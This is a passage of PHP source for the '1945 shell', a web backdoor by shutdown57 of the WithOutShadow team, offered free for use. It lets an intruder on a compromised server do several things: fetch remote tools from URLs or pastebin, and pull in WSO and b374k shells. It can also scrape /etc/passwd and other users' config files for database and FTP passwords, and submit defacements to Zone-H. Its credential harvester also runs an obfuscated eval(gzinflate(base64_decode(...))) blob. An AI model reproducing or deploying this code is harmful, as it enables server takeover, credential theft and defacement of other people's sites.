714<tr><td>save as:</td><td><input type="text" name="pname" value="'.$_GET['ctools'].'/mytools.php" style="width:200px" required></td></tr>
715<tr><th colspan=2>
716 <input type="submit" value="create!" name="ctools"></th></tr>
717 </table>
718 </form>';
719if(isset($_POST['ctools'])){
720 if(!empty($_POST['url'])){
721 $st=file_get_contents(htmlspecialchars($_POST['url']));
722 $fp=fopen($_POST['pname'],'w');
723 if(fwrite($fp,$st)){
724 echo "done!! --> <a href='?act=".$_GET['act']."&src=".$_POST['pname']."' target='_blank'>click here</a>";
725 }
726 fclose($fp);
727 }else{
728 if(!empty($_POST['pastebin'])){
729 $st=file_get_contents(htmlspecialchars("http://pastebin.com/".$_POST['pastebin']));
730 $fp=fopen($_POST['pname'],'w');
731 if(fwrite($fp,$st)){
732 echo "done!! --> <a href='?act=".$_GET['act']."&src=".$_POST['pname']."' target='_blank'>click here</a>";
733 }
734 fclose($fp);
735 }
736}
737}
738}elseif (isset($_GET['stringtools'])) {
739 echo' <center>
740 <h3>: String Tools :</h3>
741 [<a href="?act='.$_GET['act'].'&replace='.$_GET['stringtools'].'">Auto replace String</a>]<br>
742 <font color=white> NB : tools ini adalah perbaikan dari enc0de dec0de script dan saya tambahkan coventer</font>
743 <br>
744<form method="post">
745<textarea name="e" style="width:77%;height:300px" class="form-control" placeholder="input string here [!]">
746</textarea><br><br>
747
748 <select name="opt" class="form-control" style="width:70%">
749 <optgroup label="Converter">
750 <option value="dechex">Decimal to Hexa</option> <option value="hexdec">Hexa to Decimal</option>
751<option value="decoct">Decimal to Octa</option>
752<option value="octdec">Octa to Decimal</option>
753 <option value="decbin">Decimal to Binary</option>
754 <option value="bindec">Binary to Decimal</option>
755 <option value="hexbin">Hexa to Binary</option>
756<option value="binhex">Binary to Hexa</option>
757</optgroup><optgroup label="encode&decode">
758 <option value="url">URL</option> <option value="base64">base64</option>
759<option value="urlbase64">URL - base64</option>
760<option value="cuu">Convert_uu</option>
761<option value="sgzcuus64">str_rot13 - gzinflate - convert_uu - str_rot13 - base64 </option>
762<option value="gz64">gzinflate - base64</option>
763 <option value="sgz64">str_rot13 - gzinflate - base64</option>
764 <option value="s64">str_rot13 - gzinflate - str_rot13 - base64</option>
765<option value="sb64">str_rot13 - base64 </option>
766 <option value="64url">URL - base64</option>
767<option value="64u64u">URL - base64 - url - base64</option>
768<option value="ss64"> base64 - str_rot13 - str_rot13</option>
769</optgroup>
770 </select>
771 <br>
772<input type="submit" value="Convert!" name="c" class="btn btn-success btn-sm">
773<input type="submit" value="enc0de" name="en" class="btn btn-primary btn-sm">
774<input type="submit" value="dec0de" name="de" class="btn btn-danger btn-sm">
775</form>
776
777 ';
778 $a = $_POST['e'];
779 $o = $_POST['opt'];
780 if(isset($_POST['c'])){
781 switch($o){
782 case'dechex';
783 $s= dechex($a);
784 break;
785 case'dechex';
786 $s= hexdec($a);
787 break;
788 case'decoct';
789 $s= decoct($a);
790 break;
791 case'octdec';
792 $s= octdec($a);
793 break;
794 case'decbin';
795 $s= decbin($a);
796 break;
797 case'bindec';
798 $s= bindec($a);
799 break;
800 case'hexbin';
801 $s= hex2bin($a);
802 break;
803 case'binhex';
804 $s= bin2hex($a);
805 break;
806 }
807echo'<br>:: OutPut ::<br><textarea style="width:77%;height:300px ">'.$s.'</textarea>';
808 }elseif(isset($_POST['en'])){
809 switch($o){
810 case'url';
811 $r=urlencode($a);
812 break;
813 case'base64';
814 $r=base64_encode($a);
815 break;
816 case'urlbase64';
817 $r=urlencode(base64_encode($a));
818 break;
819 case'gz64';
820 $r=base64_encode(gzdeflate($a));
821
822 break;
823 case'sgz64';
824 $r=base64_encode(gzdeflate(str_rot13($a)));
825 break;
826 case's64';
827 $r=(base64_encode(str_rot13(gzdeflate(str_rot13($a)))));
828 break;
829 case'sb64';
830 $r=base64_encode(str_rot13($a));
831 break;
832 case'64url';
833 $r=base64_encode(urlencode($a));
834 break;
835 case'64u64u';
836 $r=base64_encode(urlencode(base64_encode(urlencode($a))));
837 break;
838 case'cuu';
839 $r=convert_uuencode($a);
840 break;
841 case'sgzcuus64';
842 $r=base64_encode(str_rot13(convert_uuencode(gzdeflate(str_rot13($a)))));
843 break;
844 case'ss64';
845 $r=str_rot13(str_rot13(base64_encode($a)));
846 break;
847 }
848 echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" >'.$r.'</textarea>';
849
850 }
851//Dec0de
852 if(isset($_POST['de'])){
853 switch($o){
854 case'url';
855 $r=urldecode($a);
856 break;
857 case'base64';
858 $r=base64_decode($a);
859 break;
860 case'urlbase64';
861 $r=base64_decode(urldecode($a));
862 break;
863 case'gz64';
864 $r=gzinflate(base64_decode($a));
865
866 break;
867 case'sgz64';
868 $r=str_rot13(gzinflate(base64_decode($a)));
869 break;
870 case's64';
871 $r=str_rot13(gzinflate(str_rot13(base64_decode($a))));
872 break;
873 case'sb64';
874 $r=str_rot13(base64_decode($a));
875 break;
876 case'64url';
877 $r=urldecode(base64_decode($a));
878 break;
879 case'64u64u';
880 $r=urldecode(base64_decode(urldecode(base64_decode($a))));
881 break;
882 case'cuu';
883 $r=convert_uudecode($a);
884 break;
885 case'sgzcuus64';
886 $r=str_rot13(gzinflate(convert_uudecode(str_rot13(base64_decode($a)))));
887 break;
888 case'ss64';
889 $r=base64_decode(str_rot13(str_rot13($a)));
890 }
891 $rx = htmlspecialchars($r);
892 echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" >'.$rx.'</textarea>';
893
894 }
895
896}elseif (isset($_GET['about'])) {
897 ?>
898<center>
899<img src="https://2.bp.blogspot.com/-fE4-9A9N5Gk/V1h9fkMT75I/AAAAAAAAF6o/gz0oZg-G6kkB-VL8nIxsDocraNsiYdb2QCLcB/s320/Logo%2BHUT%2BRI%2BKe-71%2BTahun%2B2016.jpg" width="500" height="300">
900<br>
901<h3> : 1945 shell NewRelease :</h3>
902<p>Assalamualaikum wr. wb.</p>
903<pre>
904okey.. kawan gak banyak omong!
905shell (backd00r) ini bukan rec0de dari shell manapun dan gak semuaNya saya c0ding sendiri ada beberapa tools dari google dan teman saya,
906kenapa nama shell ini "1945" karena saya ingin membuat karya pada hari kemerdekaan indonesia (17081945),
907Shell ini milik WithOutShadow team (<a href='http://www.withoutshadow.org'>http://www.withoutshadow.org</a>)
908dan dibagikan secara gratis untuk anda :)
909+------------------------------------------------------------------------------------------------------------+
910 1945 shell by : shutdown57
911: Greet Thanks :
912-- Tuhan YME -- Pahlawan perjuangan Indonsia --
913-- [-]sh4d0w_99[!] -- MRG#7 -- sunr15{3} -- anonXc0de -- root@hex -- pastebin.com -- google.com --
914
915</pre>
916 <?php
917}elseif (isset($_GET['unzip'])) {
918echo'
919<center>
920<h3>: Unzip Files :</h3>
921<br>
922<table border=1>
923<tr><td>file zip</td><td>Target Dir</td>
924</tr>
925<tr><td>
926<form method="post">
927<input type="text" name="filezip" value="'.$_GET['unzip'].'/file.zip" >
928</td><td>
929<input type="text" name="dirzip" value="'.$_GET['unzip'].'/" >
930</td></tr>
931</table>
932<input type="submit" name="ext" value="unzip!!">
933</form>';
934
935if(isset($_POST['ext'])){
936 $zip = new ZipArchive;
937$res = $zip->open($_POST['filezip']);
938
939if ($res === TRUE) {
940
941$zip->extractTo($_POST['dirzip']);
942
943$zip->close();
944 echo "<br>DONE..!! extracted !";
945 } else {
946
947echo "failed";
948 }
949}
950}elseif (isset($_GET['download'])) {
951 @ob_clean();
952 $dunlut = $_GET['download'];
953 header('Content-Description: File Transfer');
954 header('Content-Type: application/octet-stream');
955 header('Content-Disposition: attachment; filename="'.basename($dunlut).'"');
956 header('Expires: 0');
957 header('Cache-Control: must-revalidate');
958 header('Pragma: public');
959 header('Content-Length: ' . filesize($dunlut));
960 readfile($dunlut);
961 exit;
962
963}elseif (isset($_GET['mail'])) {
964 $e=function_exists('mail');
965 if($e){
966 echo "
967 <center>
968 <h3>: mail sender :</h3>
969 <br>
970 <form method='post' >
971 <table border=1>
972 <tr>
973 <td>from :</td><td><input type='text' name='from' value='shutdown57@indonesia.go.id' ></td></tr>
974 <tr><td>For:</td><td><input type='text' name='for' value='admin@".$_SERVER['HTTP_HOST']."'></td></tr>
975 <tr><td>Subject:</td><td><input type='text' name='subject' value='patch ur site!' ></td></tr>
976 </table>
977 <textarea name='cont' style='width:500px;height:300px'>please..patch ur face! ur face is bad :p </textarea>
978 <br>
979 <input type='submit' name='sent' value='send!!' >
980 </form>";
981
982}else{
983 echo" mail() function does not exists in this website!";
984}
985if(isset($_POST['sent'])){
986 if(mail($_POST['for'],$_POST['subject'],$_POST['cont'],$_POST['from'])){
987 echo "send!!".$_POST['for'];
988 }else{
989 echo"failed !!!";
990 }
991}
992}elseif (isset($_GET['kuchiyose'])) {
993echo "
994<center>
995<h3>: Kuchiyose No Jutsu :</h3>
996<br>
997<p><font color=white>NB : Jika ada error/script tidak muncul ,ganti IP mu atau pake anonymoX<br>
998(saran IP USA ) </font></p>
999[<a href='?act=".$_GET['act']."&kuchiyose=adminer'>adminer</a>]-[<a href='?act=".$_GET['act']."&kuchiyose=wso'>WSO shell</a>]<br>
1000[<a href='?act=".$_GET['act']."&kuchiyose=bejak'>b374k</a>]-[<a href='?act=".$_GET['act']."&kuchiyose=whmcs'>WHMCS killer</a>]<br>
1001[<a href='?act=".$_GET['act']."&kuchiyose=bypass_shell'>Bypass Shell To .JPG Files</a>]";
1002}elseif (isset($_GET['cpbrute'])) {
1003 echo '';
1004 ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1005 set_time_limit(0);
1006
1007 @$passwd = fopen('/etc/passwd','r');
1008 if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
1009 $pub = array();
1010 $users = array();
1011 $conf = array();
1012 $i = 0;
1013 while(!feof($passwd))
1014 {
1015 $str = fgets($passwd);
1016 if ($i > 35)
1017 {
1018 $pos = strpos($str,':');
1019 $username = substr($str,0,$pos);
1020 $dirz = '/home/'.$username.'/public_html/';
1021 if (($username != ''))
1022 {
1023 if (is_readable($dirz))
1024 {
1025 array_push($users,$username);
1026 array_push($pub,$dirz);
1027 }
1028 }
1029 }
1030 $i++;
1031 }
1032
1033 echo '<h3>: cPanel bruteForce</h3>
1034 <br>
1035 <br>
1036 <textarea cols="100" rows="20">';
1037 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
1038 echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
1039 echo "[~] Searching for passwords in config files...\n\n";
1040 foreach ($users as $user)
1041 {
1042 $path = "/home/$user/public_html/";
1043 read_dir($path,$user);
1044 }
1045 echo "\n[+] Done\n";
1046 function read_dir($path,$username)
1047 {
1048 if ($handle = opendir($path))
1049 {
1050 while (false !== ($file = readdir($handle)))
1051 {
1052 $fpath = "$path$file";
1053 if (($file != '.') and ($file != '..'))
1054 {
1055 if (is_readable($fpath))
1056 {
1057 $dr = $fpath."/";
1058 if (is_dir($dr))
1059 {
1060 read_dir($dr,$username);
1061 }
1062 else
1063 {
1064 if (
1065 ($file=='config.php')
1066 or ($file=='config.inc.php')
1067 or ($file=='conf.php')
1068 or ($file=='settings.php')
1069 or ($file=='configuration.php')
1070 or ($file=='wp_config.php')
1071 or ($file=='wp-config.php')
1072 or ($file=='inc.php')
1073 or ($file=='setup.php')
1074 or ($file=='dbconf.php')
1075 or ($file=='dbconfig.php')
1076 or ($file=='db.inc.php')
1077 or ($file=='dbconnect.php')
1078 or ($file=='connect.php')
1079 or ($file=='common.php')
1080 or ($file=='config_global.php')
1081 or ($file=='db.php')
1082 or ($file=='connect.inc.php')
1083 or ($file=='e107_config.php')
1084 or ($file=='dbconnect.inc.php'))
1085 {
1086 $pass = get_pass($fpath);
1087 if ($pass != '')
1088 {
1089 echo "[+] $fpath\n$pass\n";
1090 ftp_check($username,$pass);
1091 }
1092 }
1093 }
1094 }
1095 }
1096 }
1097 }
1098 }
1099 function get_pass($link)
1100 {
1101 @$config = fopen($link,'r');
1102 while(!feof($config))
1103 {
1104 $line = fgets($config);
1105 if (strstr($line,'pass')
1106 or strstr($line,'pwd')
1107 or strstr($line,'db_pass')
1108 or strstr($line,'dbpass')
1109 or strstr($line,'passwd'))
1110 {
1111 if (strrpos($line,'"'))
1112 {
1113 preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
1114 $pass = str_replace("]=\"","",$pass);
1115 }
1116
1117 else
1118 preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
1119 $pass = str_replace("]='","",$pass);
1120 return $pass[2];
1121 }
1122 }
1123 }
1124 function ftp_check($login,$pass)
1125 {
1126 @$ftp = ftp_connect('127.0.0.1');
1127 if ($ftp)
1128 {
1129 @$res = ftp_login($ftp,$login,$pass);
1130 if ($res)
1131 {
1132 echo '[FTP] '.$login.':'.$pass." Success !\n\n";
1133
1134 eval(gzinflate(base64_decode('rVPBbtswDL0b8D9ohoEmgFtUzmVo1qHDkC49rDPiZId2RaDITOrVEQ3JQdEN+6D95UTJSbHB2cnxQeIj3yMjknGBW1EqdsniZT6ZfZ3M7k+m83m2nH7J5ycP4zCI65Rbd8r9PaV76u/nb51lD7Kld64NyiesQQ1ir50QK4lBa4XuMI1O+Pmw5fBjHH6c4xN3sqyrm0dfuR68cXUOw+BnLPhlNNEadTT+FQZQGdij+U5KMCYar2WFBgaeQ1GvGtxrpJ0aabcG/0fDFutVRp0qo24VYnkd6oKxzYvC4LSv3zcVBh9roaBii7oQDbAbtUZ2X+MzaCjY6oV9WtzcTnI2A4kFEPBZmKflVmxKWQp1xx4YifRa0RRNwy5Y22hCFgY0IRVuPJAJYwio7dl7/g+2DXXDMtSN+3N5PrW5nGknhpDrefaKpITIzL3iARz1XtVvu3yct/1I/urCD5v10LCZHZ2VUEXZ3PVcQ0Qb2aDdxkiozaYEgVpcvYhHxDOJW+fWIMv6vxFmt/oOsqGY9tHovU3eTqCLeQRRgDYUc61xe8F2zvdOwbO5kvWpN89KO6zviWDnpBrY0pK9ekK7kux1hocQV97RqD8=')));
1135
1136 echo '[SSH] Port' .':' .$a1. " !\n\n";
1137 echo '[FTP] Port' .':' .$a2. " !\n\n";
1138 echo '[cPanel] Port' .':' .$a3. " !\n\n";
1139
1140 }
1141 else ftp_quit($ftp);
1142 }
1143 }
1144 echo '</textarea><br><br><b>BruteForce Completed ...</b>';
1145}elseif (isset($_GET['copy'])) {
1146echo'
1147<center>
1148<h3>: copy file :</h3>
1149<br>
1150<form method="post">
1151file :<input type="text" name="copy" value="'.$_GET['act'].'" style="width:200px"> copy to:
1152<input type="text" name="copied" value="'.$_GET['act'].'/copy-" style="width:200px">
1153<input type="submit" name="cop" value=">>">
1154</form>';
1155if(isset($_POST['cop'])){
1156 if(copy($_POST['copy'],$_POST['copied'])){
1157 echo" done!! copied! <a href='?act=".$_GET['act']."&src=".$_POST['copied']."'>".$_POST['copied']."</a>";
1158 }
1159}
1160}elseif ($_GET['act']=='logout') {
1161 session_destroy();
1162 echo'<script>
1163 alert("bye.. !!!!!!!!");
1164 window.location.href="?";
1165 </script>';
1166}elseif (isset($_GET['phpinfo'])) {
1167 phpinfo();
1168}elseif (isset($_GET['zoneh'])) {
1169?>
1170<center>
1171<h3>: Zone-H Mass Notifer :</h3>
1172</center>
1173<form method="post">
1174<center>
1175<input type="text" name="depecer" style="width:500px" placeholder="defacer">
1176<br>
1177<textarea name="url" placeholder="http://korban.com" style="width:500px;height:300px;"></textarea><br>
1178<input type="submit" name="go" value="subMitt" >
1179</form>
1180<?php
1181$url = explode("\r\n", $_POST['url']);
1182$go = $_POST['go'];
1183function kirim($target,$hacker) {
1184 $ch = curl_init();
1185 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1186 curl_setopt($ch, CURLOPT_URL, "http://zone-h.org/notify/single");
1187 curl_setopt($ch, CURLOPT_POST, true);
1188 curl_setopt($ch, CURLOPT_POSTFIELDS, array(
1189 "defacer" => $hacker,
1190 "domain1" => $target,
1191 "hackmode" => "1",
1192 "reason" => "1",
1193 ));
1194 $res = curl_exec($ch);
1195 curl_close($ch);
1196 return preg_match("/<font color=\"red\">OK<\/font><\/li>/", $res);
1197}
1198if($go) {
1199 foreach($url as $sites) {
1200 if(kirim($sites,$_POST['depecer'])) {
1201 echo "<br>[ OK ] => $sites <br>";
1202 } else {
1203 echo "<br>[ ERROR ] => $sites <br>";
1204 }
1205 }
1206}
1207
1208}elseif (isset($_GET['replace'])) {
1209 echo"
1210 <center>
1211 <h3>: auto replace string :</h3>
1212 <P>NB : gunakan otak kalian ! </p>
1213 <br>
1214 <form method='post'>
1215 <input type='submit' name='sstr' value='replace all'>
1216 <table style='border-collapse:collapse;border:1px solid #eee;' border=1><tr><td>
1217 <textarea name='str' style='width:600px;height:200px;' required>Your string here / string anda sini</textarea></td><td>
1218 <textarea name='str2' style='width:600px;height:200px;' required>string will u replace / string yang ingin anda ganti</textarea></td></tr>
1219 <tr><td>
1220 <textarea name='str3' style='width:600px;height:200px;' required>string replace /ganti string</textarea></td><td>
1221 <form>";
1222 if(isset($_POST['sstr'])){
1223 $rep=str_replace($_POST['str2'],$_POST['str3'],$_POST['str']);
1224 if($rep){
1225 echo'
1226 <textarea style="width:600px;height:200px;">'.$rep.'</textarea></td></tr></table>';
1227 }
1228 }
1229}
1230}else{
1231 ?>
1232<table class="tbl_exp" border='1'>
1233<tr id="thead">
1234<th>No</th><th>^</th><th>Name</th><th>Permission</th><th>Size</th><th>Last Modified</th><th>action</th>
1235</tr>
1236
1237<?php
1238if(isset($_GET['45'])){
1239$d=$_GET['45'];
1240}else{
1241$d=getcwd();
1242}
1243$d=str_replace('\\','/',$d);
1244$sdir=scandir($d);
1245$no=1;
1246echo'
1247<form method="post">
1248<tr class="hover">
1249
1250 <td style="width:25px;max-width:48px;">-</td><td style="width:20px">^</td><td style="width:20%;max-width:500px;">
1251 <--[<a href="?45='.dirname($d).'">..</a>]</td><td>--</td><td>--</td><td>--</td><td>[<a href="?act='.$d.'&upload='.$d.'/'.$dir.'">upload</a>][<a href="?act='.$d.'&mkdir='.$d.'/'.$dir.'">newdir</a>][<a href="?act='.$d.'&newfile='.$d.'/'.$dir.'">newfile</a>]</td></tr>';
1252foreach ($sdir as $dir) {
1253 if(!is_dir("$d/$dir")||$dir=='.'||$dir=='..')continue;
1254 echo'
1255
1256 <tr class="hover">
1257 <td>'.$no++.'</td><td>
1258<input type="checkbox" name="cekd[]" value="'.$d.'/'.$dir.'">
1259</td>
1260 <td style="width:20%;max-width:500px;">'.$folder.'
1261 [<a href="?45='.$d.'/'.$dir.'">'.substr($dir,0,40).'</a>]</td>
1262 <td>'.perms("$d/$dir").'</td><td>DIR</td><td>'.date('d M Y | H:m',filemtime("$d/$dir")).'</td><td style="width:20%;max-width:400px;">
1263 [<a href="?act='.$d.'&rmdir='.$d.'/'.$dir.'">delete</a>][<a href="?act='.$d.'&rename='.$d.'/'.$dir.'">rename</a>][<a href="?act='.$d.'&chmod='.$d.'/'.$dir.'">chmod</a>]</td></tr>';
1264}
1265foreach ($sdir as $file) {
1266 if(!is_file("$d/$file"))continue;
1267 $size = filesize("$d/$file")/1024;
1268$size = round($size,3);
1269if($size >= 1024){
1270$size = round($size/1024,2).' MB';
1271}else{
1272$size = $size.' KB';
1273}
1274 echo'
1275 <tr class="hover">
1276 <td>'.$no++.'</td><td><input type="checkbox" name="cekf[]" value="'.$d.'/'.$file.'"></td><td style="width:20%;max-width:500px;">'.$files.'
1277 -<a href="?act='.$d.'&src='.$d.'/'.$file.'">'.substr($file,0,40).'</a></td>
1278 <td>'.perms("$d/$file").'</td><td>'.$size.'</td><td>'.date('d M Y | H:m',filemtime("$d/$file")).'</td><td style="width:20%;max-width:400px;">
1279 [<a href="?act='.$d.'&edit='.$d.'/'.$file.'">edit</a>][<a href="?act='.$d.'&rm='.$d.'/'.$file.'">delete</a>][<a href="?act='.$d.'&rename='.$d.'/'.$file.'">rename</a>][<a href="?act='.$d.'&chmod='.$d.'/'.$file.'">chmod</a>][<a href="?act='.$d.'&download='.$d.'/'.$file.'">Download</a>]</td></tr>';
1280}
1281echo'
1282<tr>
1283<td colspan="7">
1284action for selected files : <select name="select">
1285<option value="del">delete</option>
1286<option value="copy">backUp</option>
1287<option value="unzip">unzip</option>
1288<option value="compress">compress .gz</option>
1289</select>
1290<input type="submit" name="sbmt" value=">>" >
1291</form></td></tr>
1292</table>';
1293if(isset($_POST['sbmt'])){
1294 $file=$_POST['cekf'];
1295 $dir=$_POST['cekd'];
1296 if($_POST['select']=='del'){
1297 if($_POST['cekf']){
1298
1299 foreach ($file as $cekf) {
1300 if(unlink($cekf)){
1301 echo"<meta http-equiv='refresh' content=0;url=>";
1302 }
1303 }
1304 }
1305 if($_POST['cekd']){
1306
1307 foreach ($dir as $cekd) {
1308 if(rmdir($cekd)){
1309 echo"<meta http-equiv='refresh' content=0;url=>";
1310 }
1311 }}}elseif($_POST['select']=='copy'){
1312if($_POST['cekf']){
1313
1314 foreach ($file as $copy) {
1315 $copi=basename($copy);
1316 @mkdir('45backUp');
1317 if(copy($copy,"45backUp/".basename($copy))){
1318 echo"[<font color=lime>OK</font>]--> 45backUp/".basename($copy)."<br>";
1319 }else{
1320 echo "[<font color=grey>FAIL</font>]--> 45backUp/".basename($Copy)."<br>";
1321 }
1322 }
1323}
1324}elseif ($_POST['select']=='unzip') {
1325 @mkdir("45extracted");
1326 foreach ($file as $unzip) {
1327 $zip = new ZipArchive;
1328$res = $zip->open($unzip);
1329
1330if ($res === TRUE) {
1331
1332$zip->extractTo("45extracted/");
1333
1334$zip->close();
1335 echo "[<font color=lime>OK</font>] extracted !<br>";
1336 } else {
1337
1338echo "[<font color=grey>FAIL</font>] feiled!";
1339 }
1340 }
1341}
1342}
1343}
1344function perms($file){
1345$perms = fileperms($file);
1346
1347if (($perms & 0xC000) == 0xC000) {
1348// Socket
1349$info = 's';
1350} elseif (($perms & 0xA000) == 0xA000) {
1351// Symbolic Link
1352$info = 'l';
1353} elseif (($perms & 0x8000) == 0x8000) {
1354// Regular
1355$info = '-';
1356} elseif (($perms & 0x6000) == 0x6000) {
1357// Block special
1358$info = 'b';
1359} elseif (($perms & 0x4000) == 0x4000) {
1360// Directory
1361$info = 'd';
1362} elseif (($perms & 0x2000) == 0x2000) {
1363// Character special
1364$info = 'c';
1365} elseif (($perms & 0x1000) == 0x1000) {
1366// FIFO pipe
1367$info = 'p';
1368} else {
1369// Unknown
1370$info = 'u';
1371}
1372
1373// Owner
1374$info .= (($perms & 0x0100) ? 'r' : '-');
1375$info .= (($perms & 0x0080) ? 'w' : '-');
1376$info .= (($perms & 0x0040) ?
1377(($perms & 0x0800) ? 's' : 'x' ) :
1378(($perms & 0x0800) ? 'S' : '-'));
1379
1380// Group
1381$info .= (($perms & 0x0020) ? 'r' : '-');
1382$info .= (($perms & 0x0010) ? 'w' : '-');
1383$info .= (($perms & 0x0008) ?
1384(($perms & 0x0400) ? 's' : 'x' ) :
1385(($perms & 0x0400) ? 'S' : '-'));
1386
1387// World
1388$info .= (($perms & 0x0004) ? 'r' : '-');
1389$info .= (($perms & 0x0002) ? 'w' : '-');
1390$info .= (($perms & 0x0001) ?
1391(($perms & 0x0200) ? 't' : 'x' ) :
1392(($perms & 0x0200) ? 'T' : '-'));
1393
1394return $info;
1395}
1396?>
1397<div style="font-size:11px;position:fixed;bottom:0;left:0;">
1398copyright © <?php echo date('Y');?> | 1945 shell by : shutdown57 | <a href="http://www.withoutshadow.org"> www.withoutshadow.org</a>
1399</div>
1400</body>
1401</html>